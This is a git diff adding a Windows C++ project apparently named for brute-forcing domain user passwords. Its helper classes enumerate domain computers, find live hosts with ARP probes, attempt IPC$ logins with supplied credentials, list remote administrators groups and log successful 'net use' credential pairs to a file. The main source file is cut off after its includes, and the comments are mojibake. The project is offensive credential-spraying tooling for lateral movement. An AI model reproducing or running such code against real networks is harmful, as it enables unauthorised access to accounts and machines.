diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/BlastDomainUserPwd/.gitignore b/BlastDomainUserPwd/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/BlastDomainUserPwd/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj
new file mode 100644
index 0000000..4be1091
--- /dev/null
+++ b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj
@@ -0,0 +1,154 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}
+ BlastDomainUserPwd
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v110_xp
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj.filters b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj.filters
new file mode 100644
index 0000000..e4f6474
--- /dev/null
+++ b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj.filters
@@ -0,0 +1,39 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+ 头文件
+
+
+
\ No newline at end of file
diff --git a/BlastDomainUserPwd/CommonApi.cpp b/BlastDomainUserPwd/CommonApi.cpp
new file mode 100644
index 0000000..0aaf301
--- /dev/null
+++ b/BlastDomainUserPwd/CommonApi.cpp
@@ -0,0 +1,116 @@
+#include "CommonApi.h"
+
+
+// UnicodeתΪANSI
+char* CommonApi::UnicodeToAnsi(const wchar_t* szStr)
+{
+ int nLen = WideCharToMultiByte(CP_ACP, 0, szStr, -1, NULL, 0, NULL, NULL);
+ if (nLen == 0)
+ {
+ return NULL;
+ }
+ char* pResult = new char[nLen];
+ WideCharToMultiByte(CP_ACP, 0, szStr, -1, pResult, nLen, NULL, NULL);
+ return pResult;
+}
+
+// ANSIתΪUnicode
+wchar_t* CommonApi::AnsiToUnicode(const char* str)
+{
+ int textlen;
+ wchar_t* result;
+ textlen = MultiByteToWideChar(CP_ACP, 0, str, -1, NULL, 0);
+ result = (wchar_t*)malloc((textlen + 1) * sizeof(wchar_t));
+ memset(result, 0, (textlen + 1) * sizeof(wchar_t));
+ MultiByteToWideChar(CP_ACP, 0, str, -1, (LPWSTR)result, textlen);
+ return result;
+}
+
+
+
+// ַָ
+std::vector CommonApi::splitString(std::wstring strSrc, std::wstring pattern)
+{
+ std::vector resultstr;
+
+ // ַԽȡһ
+ std::wstring strcom = strSrc.append(pattern);
+ // wprintf(L"%s\n", strcom);
+ auto pos = strSrc.find(pattern);
+ auto len = strcom.size();
+
+ //
+ while (pos != std::wstring::npos)
+ {
+ std::wstring coStr = strcom.substr(0, pos);
+ // wprintf(L"%s ", coStr.c_str());
+ resultstr.push_back(coStr);
+
+ strcom = strcom.substr(pos + pattern.size(), len);
+ pos = strcom.find(pattern);
+ }
+
+ return resultstr;
+}
+
+// ļ
+HANDLE CommonApi::CreateFileApi(LPCWSTR fileName)
+{
+ HANDLE hFile; //
+ hFile = CreateFile(fileName, // name of the write
+ GENERIC_WRITE, // open for writing
+ FILE_SHARE_READ, // do not share
+ NULL, // default security
+ OPEN_ALWAYS, // create new file only
+ FILE_ATTRIBUTE_NORMAL, // normal file
+ NULL); // no attr. template
+ return hFile;
+}
+
+// ļд
+VOID CommonApi::WriteFileApi(HANDLE hFile, LPWSTR content)
+{
+ LPSTR lpContent = UnicodeToAnsi(content); // дļ
+ DWORD dwBytesToWrite = (DWORD)strlen(lpContent); // ݳ
+ DWORD dwBytesWritten = 0;
+ BOOL bErrorFlag = FALSE;
+
+ bErrorFlag = WriteFile(
+ hFile, // open file handle
+ lpContent, // start of data to write
+ dwBytesToWrite, // number of bytes to write
+ &dwBytesWritten, // number of bytes that were written
+ NULL); // no overlapped structure
+
+ if (FALSE == bErrorFlag)
+ {
+ printf("Terminal failure: Unable to write to file.\n");
+ }
+ else
+ {
+ if (dwBytesWritten != dwBytesToWrite)
+ {
+ // This is an error because a synchronous write that results in
+ // success (WriteFile returns TRUE) should write all data as
+ // requested. This would not necessarily be the case for
+ // asynchronous writes.
+ printf("Error: dwBytesWritten != dwBytesToWrite\n");
+ }
+ /*
+ else
+ {
+ wprintf(TEXT("Wrote %d bytes to successfully.\n"), dwBytesWritten);
+ }
+ */
+ }
+}
+
+// ɹIPCĽ
+void CommonApi::saveIPCok(HANDLE SuccessFile, LPWSTR lpUncComputerName, LPWSTR lpTotalAdministratorName, LPWSTR password)
+{
+ PWCHAR wstr = new WCHAR[MAX_PATH];
+ wprintf(L"[OK] net use %s /u:%s %s\n", lpUncComputerName, lpTotalAdministratorName, password);
+ StringCchPrintfW(wstr, MAX_PATH, L"net use %s /u:%s %s\n", lpUncComputerName, lpTotalAdministratorName, password);
+ WriteFileApi(SuccessFile, wstr);
+ delete wstr;
+}
\ No newline at end of file
diff --git a/BlastDomainUserPwd/CommonApi.h b/BlastDomainUserPwd/CommonApi.h
new file mode 100644
index 0000000..a3063e0
--- /dev/null
+++ b/BlastDomainUserPwd/CommonApi.h
@@ -0,0 +1,24 @@
+#include "tou.h"
+#pragma once
+class CommonApi
+{
+public:
+ // UnicodeתΪANSI
+ char* UnicodeToAnsi(const wchar_t* szStr);
+
+ // ANSIתΪUnicode
+ wchar_t* AnsiToUnicode(const char* str);
+
+ // ַָ
+ std::vector splitString(std::wstring strSrc, std::wstring pattern);
+
+ // ļ
+ HANDLE CreateFileApi(LPCWSTR fileName);
+
+ // ļд
+ VOID WriteFileApi(HANDLE hFile, LPWSTR content);
+
+ // ɹIPCĽ
+ void saveIPCok(HANDLE SuccessFile, LPWSTR lpUncComputerName, LPWSTR lpTotalAdministratorName, LPWSTR password);
+
+};
\ No newline at end of file
diff --git a/BlastDomainUserPwd/WNetApi.cpp b/BlastDomainUserPwd/WNetApi.cpp
new file mode 100644
index 0000000..5daf7f3
--- /dev/null
+++ b/BlastDomainUserPwd/WNetApi.cpp
@@ -0,0 +1,174 @@
+#include "WNetApi.h"
+
+// ipc
+int WNetApi::WNetAddConnection2Api(LPWSTR lpRemoteName, LPWSTR lpDomainUserName, LPWSTR lpPassword)
+{
+ // wprintf(L"net use %s /u:%s %s\n", lpRemoteName, lpDomainUserName, lpPassword);
+ DWORD dwRetVal;
+ NETRESOURCE nr;
+ DWORD dwFlags;
+
+ memset(&nr, 0, sizeof(NETRESOURCE)); // սṹڴ
+
+
+ // ṹֵ
+ nr.dwType = RESOURCETYPE_ANY;
+ nr.lpLocalName = NULL; // F: ӳ䵽صĴ̣磺Z̵. ַΪգlpLocalNameΪNULLúԴӣض豸
+ nr.lpRemoteName = lpRemoteName; // \\192.168.232.128\temp ĿŹĴ
+ nr.lpProvider = NULL;
+
+
+ dwFlags = CONNECT_UPDATE_PROFILE;
+ dwRetVal = WNetAddConnection2(&nr, lpPassword, lpDomainUserName, dwFlags);
+
+ // жǷɹ
+ if (dwRetVal == NO_ERROR)
+ {
+ // wprintf(L"[+] %s Connection success\n", nr.lpRemoteName);
+ return 1;
+ }
+ else if (dwRetVal == 67) // δҵ
+ {
+ // wprintf(L"[-] %s The network name could not be found.\n", nr.lpRemoteName);
+ return 0;
+ }
+ else if (dwRetVal == 1326) // ˺
+ {
+ // wprintf(L"[-] %s The user name or password is incorrect.\n", nr.lpRemoteName);
+ return 0;
+ }
+ else //
+ {
+ // wprintf(L"[-] %s WNetAddConnection2 failed with error: %u\n", nr.lpRemoteName, dwRetVal);
+ return 0;
+ }
+
+}
+
+// ɾipc
+int WNetApi::WNetCancelConnection2Api(LPWSTR lpRemoteName)
+{
+ DWORD dwRetVal;
+ dwRetVal = WNetCancelConnection2(lpRemoteName, 0, TRUE);
+
+ if (dwRetVal == NO_ERROR)
+ {
+ // wprintf(L"Connection cancel to %s\n", lpRemoteName);
+ return 1;
+ }
+ else
+ {
+ // wprintf(L"WNetCancelConnection2 failed with error: %u\n", dwRetVal);
+ return 0;
+ }
+}
+
+// ȡб
+std::vector WNetApi::NetGroupGetUsersApi(LPWSTR servername, LPWSTR groupname)
+{
+ wprintf(L"------------------------------------Get a list of domain computers------------------------------------\n");
+
+ DWORD dwLevel = 1;
+ GROUP_USERS_INFO_1* bufptr;
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH;
+ DWORD dwEntriesread;
+ DWORD dwTotalentries;
+ DWORD dwRetVul;
+ std::vector hostnameList; // vector
+
+ dwRetVul = NetGroupGetUsers(servername, groupname, dwLevel, (LPBYTE*)&bufptr, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ wprintf(L"num: %d\n", dwEntriesread);
+
+ if (dwRetVul == NO_ERROR)
+ {
+ for (DWORD i = 0; i < dwEntriesread; i++)
+ {
+ // wprintf(L"[%u] %s ", i, bufptr[i].grui1_name);
+ std::wstring hostname(bufptr[i].grui1_name);
+ hostname.replace(hostname.end() - 1, hostname.end(), 1, NULL); // ĩβ$滻Ϊ
+ hostnameList.push_back(hostname.data()); //
+ wprintf(L"%s\n", hostname.data());
+ }
+
+
+
+ return hostnameList;
+ }
+ else
+ {
+ wprintf(L"error : %u\nhttps://docs.microsoft.com/en-us/windows/win32/netmgmt/network-management-error-codes", dwRetVul);
+ exit(0);
+ }
+
+
+}
+
+// гع
+std::vector WNetApi::NetLocalGroupGetMembersApi(LPWSTR aliveIp)
+{
+ std::vector ipAdministratorsGroup;
+
+ LPCWSTR servername = aliveIp; // ѾipcӵIP
+ LPCWSTR TargetGroup = L"administrators"; //
+ LOCALGROUP_MEMBERS_INFO_2* buff; // LOCALGROUP_MEMBERS_INFO_2ṹbuffŻȡϢ
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH; // ָݵѡȣֽΪλָMAX_PREFERRED_LENGTHúڴ
+ DWORD dwEntriesread; // ָһֵָ룬ֵʵöٵԪ
+ DWORD dwTotalentries;
+ NetLocalGroupGetMembers(servername, TargetGroup, 2, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ // wprintf(L"dwEntriesread: %d\ndwTotalentries: %d\n", dwEntriesread, dwTotalentries);
+ for (DWORD i = 0; i < dwEntriesread; i++) {
+ // wprintf(L"%s\n", buff[i].lgrmi2_domainandname);
+ ipAdministratorsGroup.push_back(buff[i].lgrmi2_domainandname);
+ // wprintf(L"SID:%d\n", buff[i].lgrmi2_sid); // sidǺҪ
+ // wprintf(L"SIDUSAGE:%d\n",buff[i].lgrmi2_sidusage);
+ }
+ return ipAdministratorsGroup;
+}
+
+
+// ̽
+BOOL WNetApi::detectAlive(int i, LPWSTR ip)
+{
+
+ DWORD dwRetVal;
+ ULONG dstMac[2] = { 0 };
+ memset(dstMac, 0xff, sizeof(dstMac));
+ ULONG MacAddr[2]; /* for 6-byte hardware addresses */
+ ULONG PhysAddrLen = 6; /* default to length of six bytes */
+
+ dwRetVal = SendARP(inet_addr(theCommonApi.UnicodeToAnsi(ip)), 0, &MacAddr, &PhysAddrLen); // arp̽ inet_addr()ǽһƵIPַ(192.168.0.1)תΪin_addrṹ
+
+ if (dwRetVal == NO_ERROR)
+ {
+ wprintf(L"[#%d] %s is alive.\n", i, ip);
+ return TRUE;
+ }
+ else {
+ wprintf(L"[#%d] %s is die. ", i, ip);
+ // printf("[#%d] Error: %s SendArp failed with error: %d", i, ip, dwRetVal);
+ switch (dwRetVal) {
+ case ERROR_GEN_FAILURE:
+ printf(" (ERROR_GEN_FAILURE)\n");
+ break;
+ case ERROR_INVALID_PARAMETER:
+ printf(" (ERROR_INVALID_PARAMETER)\n");
+ break;
+ case ERROR_INVALID_USER_BUFFER:
+ printf(" (ERROR_INVALID_USER_BUFFER)\n");
+ break;
+ case ERROR_BAD_NET_NAME:
+ printf(" (ERROR_GEN_FAILURE)\n");
+ break;
+ case ERROR_BUFFER_OVERFLOW:
+ printf(" (ERROR_BUFFER_OVERFLOW)\n");
+ break;
+ case ERROR_NOT_FOUND:
+ printf(" (ERROR_NOT_FOUND)\n");
+ break;
+ default:
+ printf("\n");
+ break;
+ }
+ return FALSE;
+ }
+}
diff --git a/BlastDomainUserPwd/WNetApi.h b/BlastDomainUserPwd/WNetApi.h
new file mode 100644
index 0000000..d164fcd
--- /dev/null
+++ b/BlastDomainUserPwd/WNetApi.h
@@ -0,0 +1,25 @@
+#include "tou.h"
+#include "CommonApi.h"
+#pragma once
+class WNetApi
+{
+public:
+ // ipc
+ int WNetAddConnection2Api(LPWSTR lpRemoteName, LPWSTR lpDomainUserName, LPWSTR lpPassword);
+
+ // ɾipc
+ int WNetCancelConnection2Api(LPWSTR lpRemoteName);
+
+ // ȡб
+ std::vector NetGroupGetUsersApi(LPWSTR servername, LPWSTR groupname);
+
+ // гع
+ std::vector NetLocalGroupGetMembersApi(LPWSTR aliveIp);
+
+ // ̽
+ BOOL detectAlive(int i, LPWSTR ip);
+
+private:
+ CommonApi theCommonApi;
+
+};
\ No newline at end of file
diff --git a/BlastDomainUserPwd/tou.h b/BlastDomainUserPwd/tou.h
new file mode 100644
index 0000000..b25924b
--- /dev/null
+++ b/BlastDomainUserPwd/tou.h
@@ -0,0 +1,28 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+
+#include
+#include
+#include
+#include // WNetAddConnection2
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include //
+#include
+#include
+#include
+#include // std::
+
+#pragma comment(lib,"iphlpapi.lib") // ̽ sendarp
+#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, "mpr.lib") // WinnetҪĶ̬ӿ
+#pragma comment(lib, "Netapi32.lib") // WinnetҪĶ̬ӿ
+#pragma comment(lib, "Kernel32.lib")
\ No newline at end of file
diff --git "a/BlastDomainUserPwd/\346\272\220.cpp" "b/BlastDomainUserPwd/\346\272\220.cpp"
new file mode 100644
index 0000000..13a7c45
--- /dev/null
+++ "b/BlastDomainUserPwd/\346\272\220.cpp"
@@ -0,0 +1,121 @@
+// EnuDomainUseröٳûбб
+#pragma once
+#ifndef UNICODE
+#define UNICODE
+#endif
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+
